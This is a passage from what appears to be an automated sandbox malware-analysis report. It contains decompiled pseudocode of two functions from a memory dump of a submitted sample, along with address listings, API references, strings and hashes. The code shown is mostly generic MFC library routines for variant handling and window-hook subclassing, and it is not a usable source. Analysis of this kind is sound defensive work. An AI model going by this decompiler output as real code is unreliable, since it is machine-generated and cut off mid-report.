					L37:
					_t295 = 0;
					E0041A7E4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E0041F330(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x439340, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E0041C700(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E00402F0C(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E0041B9F7(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E00402F0C(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M0041CCE7))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E0040ECBE(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E00403115(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E00402EE1(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E0041C157(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E0040342E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E0040342E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E0040342E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E0041F7F4(_t300 + 0x14, 0x43ef68);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E00402EE1(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E0041F330(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M0041CC9B))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E0041B66F(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E0041BA91(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E00402F0C(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M0041CC4B))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E004036AB(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E00403036(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E004037AF(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

0x0041c757
0x0041c75e
0x0041c763
0x0041c766
0x0041c76a
0x0041cc43
0x0041cc48
0x0041cc48
0x0041c770
0x0041c773
0x0041c776
0x0041c779
0x0041c783
0x0041c786
0x0041c78b
0x0041c791
0x0041c79c
0x0041c79c
0x0041c7a3
0x0041c7aa
0x0041c7af
0x0041c7b6
0x0041c7b6
0x0041c7b9
0x0041c7c0
0x0041c7c3
0x0041c7c6
0x0041c7c9
0x0041c7cc
0x0041c7cf
0x0041c7d3
0x0041c7d7
0x0041c7d8
0x0041c9f8
0x0041c9fc
0x0041c9fe
0x0041ca07
0x0041ca09
0x0041ca09
0x0041ca16
0x0041ca1e
0x0041ca20
0x0041ca4c
0x0041ca4f
0x0041ca54
0x0041ca59
0x0041ca84
0x0041ca84
0x0041ca87
0x0041ca90
0x0041ca93
0x0041cb68
0x0041cb68
0x0041cb6e
0x0041cc25
0x0041cc28
0x0041cc2c
0x0041cc31
0x0041cc35
0x0041cc38
0x0041cc3a
0x0041cc3d
0x0041cc42
0x00000000
0x0041cc38
0x0041cb78
0x0041cb9d
0x0041cba0
0x0041cba3
0x0041cba6
0x00000000
0x00000000
0x0041cba8
0x00000000
0x0041cbb9
0x0041cbc0
0x00000000
0x00000000
0x0041cc1d
0x0041cc20
0x0041cc23
0x00000000
0x00000000
0x0041cbd8
0x0041cbdb
0x00000000
0x00000000
0x0041cbe2
0x0041cbe5
0x00000000
0x00000000
0x0041cbc5
0x0041cbc8
0x0041cbcb
0x0041cbcd
0x0041cbd0
0x00000000
0x00000000
0x0041cbef
0x0041cbf4
0x0041cbf7
0x00000000
0x00000000
0x0041cbff
0x0041cc02
0x0041cc04
0x0041cc08
0x0041cc0b
0x00000000
0x00000000
0x0041cc0f
0x0041cc12
0x0041cc15
0x0041cc16
0x0041cc17
0x0041cc18
0x0041cc19
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cbb5
0x00000000
0x00000000
0x0041cba8
0x0041cb7c
0x0041cb81
0x0041cb87
0x0041cb89
0x0041cb8b
0x00000000
0x00000000
0x0041cb91
0x0041cb97
0x0041caaf
0x0041caaf
0x0041cab4
0x0041cab4
0x0041cab7
0x0041cac0
0x0041cac0
0x0041cac5
0x0041cacb
0x0041cace
0x0041cad0
0x0041cad4
0x0041cad6
0x0041cade
0x0041cadf
0x0041cae5
0x0041cae5
0x0041cae7
0x0041caed
0x0041caf3
0x0041cafb
0x0041cb03
0x0041cb06
0x0041cb06
0x0041cb11
0x0041cb17
0x0041cb19
0x0041cb20
0x0041cb25
0x0041cb28
0x0041cb28
0x0041cb30
0x0041cb32
0x0041cb39
0x0041cb3e
0x0041cb41
0x0041cb41
0x0041cb49
0x0041cb4e
0x0041cb54
0x0041cb60
0x0041cb63
0x00000000
0x0041cb63
0x0041ca9d
0x0041caa3
0x0041caaa
0x00000000
0x00000000
0x0041caac
0x00000000
0x0041ca5b
0x0041ca5e
0x0041ca64
0x0041ca7f
0x0041ca7f
0x0041ca82
0x00000000
0x00000000
0x0041ca6a
0x0041ca6c
0x0041ca6e
0x0041ca74
0x0041ca75
0x0041ca7b
0x0041ca7b
0x0041ca7e
0x0041ca7e
0x00000000
0x0041ca7e
0x0041ca70
0x0041ca72
0x00000000
0x00000000
0x00000000
0x0041ca72
0x00000000
0x0041ca7f
0x0041c7de
0x0041c7e2
0x0041c7f2
0x0041c7fd
0x0041c800
0x0041c808
0x0041c80b
0x0041c80e
0x0041c814
0x0041c814
0x0041c818
0x0041c81b
0x0041c81e
0x00000000
0x00000000
0x0041c824
0x0041c829
0x0041c82c
0x0041c832
0x0041c835
0x0041c838
0x0041c83b
0x0041c841
0x0041c844
0x0041c847
0x0041c851
0x0041c851
0x0041c854
0x0041c85c
0x0041c85e
0x0041c97b
0x0041c980
0x0041c983
0x00000000
0x00000000
0x0041c985
0x00000000
0x00000000
0x00000000
0x0041c98c
0x0041c98f
0x0041c991
0x0041c997
0x0041c9a1
0x0041c9a8
0x0041c9aa
0x0041c9b6
0x0041c9ba
0x0041c9bf
0x0041c9c3
0x0041c9c7
0x0041c9c9
0x0041c9cc
0x0041c9d1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c864
0x0041c864
0x0041c9d4
0x0041c9d4
0x0041c9d7
0x0041c9d7
0x0041c9db
0x00000000
0x0041c9db
0x0041c86b
0x0041c86f
0x00000000
0x00000000
0x0041c875
0x00000000
0x0041c88a
0x0041c88d
0x0041c88f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c8b2
0x0041c8b6
0x0041c8bb
0x0041c8be
0x00000000
0x00000000
0x0041c8c5
0x0041c8c9
0x0041c8ce
0x0041c8d1
0x00000000
0x00000000
0x0041c8d8
0x0041c8db
0x0041c8dd
0x00000000
0x00000000
0x0041c8e1
0x0041c8e4
0x0041c8e6
0x0041c8e8
0x0041c8e9
0x0041c8ec
0x0041c8f2
0x0041c8f6
0x0041c8f8
0x00000000
0x00000000
0x0041c8fe
0x0041c900
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c953
0x0041c956
0x0041c95a
0x0041c95c
0x0041c95e
0x0041c95e
0x00000000
0x00000000
0x0041c963
0x0041c967
0x0041c96a
0x0041c96d
0x0041c96f
0x0041c970
0x0041c971
0x0041c972
0x0041c973
0x0041c976
0x0041c978
0x00000000
0x00000000
0x0041c90b
0x0041c90b
0x0041c90e
0x0041c910
0x0041c912
0x0041c913
0x0041c916
0x0041c919
0x0041c91e
0x0041c921
0x0041c925
0x0041c92b
0x0041c92f
0x0041c931
0x0041c937
0x0041c937
0x0041c93a
0x0041c93d
0x0041c940
0x0041c945
0x0041c949
0x00000000
0x0041c949
0x0041c933
0x0041c935
0x0041c906
0x0041c906
0x00000000
0x0041c906
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c87c
0x0041c87f
0x0041c883
0x00000000
0x00000000
0x0041c897
0x0041c89a
0x0041c89d
0x0041c8a0
0x0041c8a0
0x0041c8a3
0x0041c8a3
0x0041c8a5
0x0041c8aa
0x00000000
0x00000000
0x0041c875
0x0041c9dd
0x0041c9dd
0x0041c9e1
0x0041c9e4
0x0041c9ed
0x0041c9ed
0x0041c9f6
0x00000000
0x0041c9f6

APIs

__EH_prolog3.LIBCMT ref: 0041C75E
_memset.LIBCMT ref: 0041C786
lstrlenA.KERNEL32(?), ref: 0041C796
_memset.LIBCMT ref: 0041C800
_memset.LIBCMT ref: 0041CA16
VariantClear.OLEAUT32(?), ref: 0041CA75
VariantClear.OLEAUT32(?), ref: 0041CA9D
SysStringLen.OLEAUT32(?), ref: 0041CAF7
SysFreeString.OLEAUT32(?), ref: 0041CB17
SysStringLen.OLEAUT32(?), ref: 0041CB1C
SysFreeString.OLEAUT32(?), ref: 0041CB30
SysStringLen.OLEAUT32(?), ref: 0041CB35
SysFreeString.OLEAUT32(?), ref: 0041CB49
__CxxThrowException@8.LIBCMT ref: 0041CB63
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0041CB81
VariantClear.OLEAUT32(?), ref: 0041CB91

Strings

XpC, xrefs: 0041C7B9

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID: XpC
API String ID: 4128688680-1560596422
Opcode ID: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
Instruction ID: 96ace918a2bd9a0f0a8ad0f941851b9479455dd266bf0f0d67035f332fcd63c4
Opcode Fuzzy Hash: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
Instruction Fuzzy Hash: 93F19AB1940209DFDF10DFA8CC84AEEBBB5EF05304F14406AE815AB291D7789E92CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4F5, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040B4F5(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E0041F753(E00432474, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x4037fd);
				 *(_t116 - 0x120) = _t110;
				_t54 = E0040F584(_t94, 0x44642c, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E004037E3(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E0040DB94(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x446804;
						if( *0x446804 == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x44640c;
								if( *0x44640c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x44640c; // 0x8000
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E0040B3B1);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E0041F330(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E0040875E(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x44640c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E0042158D(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E0040DBE0(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E00409CD8(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040A3D5);
							__eflags = _t83 - E0040A3D5;
							if(_t83 != E0040A3D5) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E0040D3B7();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E00403EE9(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E0041F7D6(_t94, _t105, _t110);
				}
			}

0x0040b4f5
0x0040b4f5
0x0040b4f5
0x0040b4ff
0x0040b504
0x0040b507
0x0040b50a
0x0040b514
0x0040b51a
0x0040b521
0x0040b523
0x0040b526
0x0040b52c
0x0040b52e
0x0040b530
0x0040b530
0x0040b539
0x0040b54e
0x0040b550
0x0040b553
0x0040b558
0x0040b55a
0x0040b55e
0x0040b564
0x0040b57b
0x0040b57b
0x0040b582
0x0040b5cf
0x0040b5cf
0x0040b5d1
0x0040b639
0x0040b641
0x0040b67d
0x0040b689
0x0040b690
0x0040b6c2
0x0040b6c5
0x0040b6cb
0x0040b6cd
0x0040b6d0
0x0040b6d8
0x0040b6df
0x0040b6e1
0x0040b6e3
0x0040b6ea
0x0040b6f2
0x0040b6f4
0x0040b6f7
0x0040b6fa
0x0040b708
0x0040b708
0x0040b6f7
0x0040b6e3
0x0040b70e
0x0040b714
0x0040b720
0x0040b726
0x0040b72d
0x0040b72f
0x0040b734
0x0040b73a
0x0040b73a
0x0040b73a
0x0040b73a
0x00000000
0x0040b73e
0x00000000
0x0040b692
0x0040b645
0x0040b650
0x0040b65b
0x0040b661
0x0040b667
0x0040b668
0x0040b66a
0x0040b672
0x0040b675
0x0040b67b
0x0040b6a1
0x0040b6a7
0x0040b6a9
0x00000000
0x00000000
0x0040b6b3
0x0040b6b7
0x0040b6bc
0x0040b6c0
0x00000000
0x00000000
0x00000000
0x0040b6c0
0x00000000
0x0040b67b
0x0040b5d9
0x0040b5de
0x0040b5e5
0x0040b5ee
0x0040b604
0x0040b606
0x0040b60c
0x0040b60e
0x0040b610
0x0040b610
0x0040b618
0x0040b61c
0x0040b620
0x0040b624
0x0040b62a
0x0040b62d
0x0040b62f
0x0040b62f
0x00000000
0x0040b624
0x0040b587
0x0040b58d
0x0040b592
0x00000000
0x00000000
0x0040b598
0x0040b59b
0x0040b5a0
0x0040b5ad
0x0040b5b1
0x0040b5b7
0x0040b5b7
0x0040b5c0
0x0040b5c5
0x0040b5c8
0x0040b5c9
0x00000000
0x00000000
0x00000000
0x0040b5c9
0x0040b566
0x0040b56d
0x00000000
0x00000000
0x0040b573
0x0040b575
0x00000000
0x00000000
0x00000000
0x0040b53b
0x0040b543
0x0040b740
0x0040b745
0x0040b745

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B4FF

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

CallNextHookEx.USER32(?,?,?,?), ref: 0040B543

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetClassLongA.USER32 ref: 0040B587
GlobalGetAtomNameA.KERNEL32 ref: 0040B5B1
SetWindowLongA.USER32 ref: 0040B606
_memset.LIBCMT ref: 0040B650
GetClassLongA.USER32 ref: 0040B680
GetClassNameA.USER32(?,?,00000100), ref: 0040B6A1
GetWindowLongA.USER32 ref: 0040B6C5
GetPropA.USER32 ref: 0040B6DF
SetPropA.USER32 ref: 0040B6EA
GetPropA.USER32 ref: 0040B6F2
GlobalAddAtomA.KERNEL32 ref: 0040B6FA
SetWindowLongA.USER32 ref: 0040B708
CallNextHookEx.USER32(?,00000003,?,?), ref: 0040B720
UnhookWindowsHookEx.USER32(?), ref: 0040B734

Strings

,dD, xrefs: 0040B50F
ime, xrefs: 0040B5BA
AfxOldWndProc423, xrefs: 0040B6D8, 0040B6DD, 0040B6E8, 0040B6F0, 0040B6F9
#32768, xrefs: 0040B662, 0040B667, 0040B6B1

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
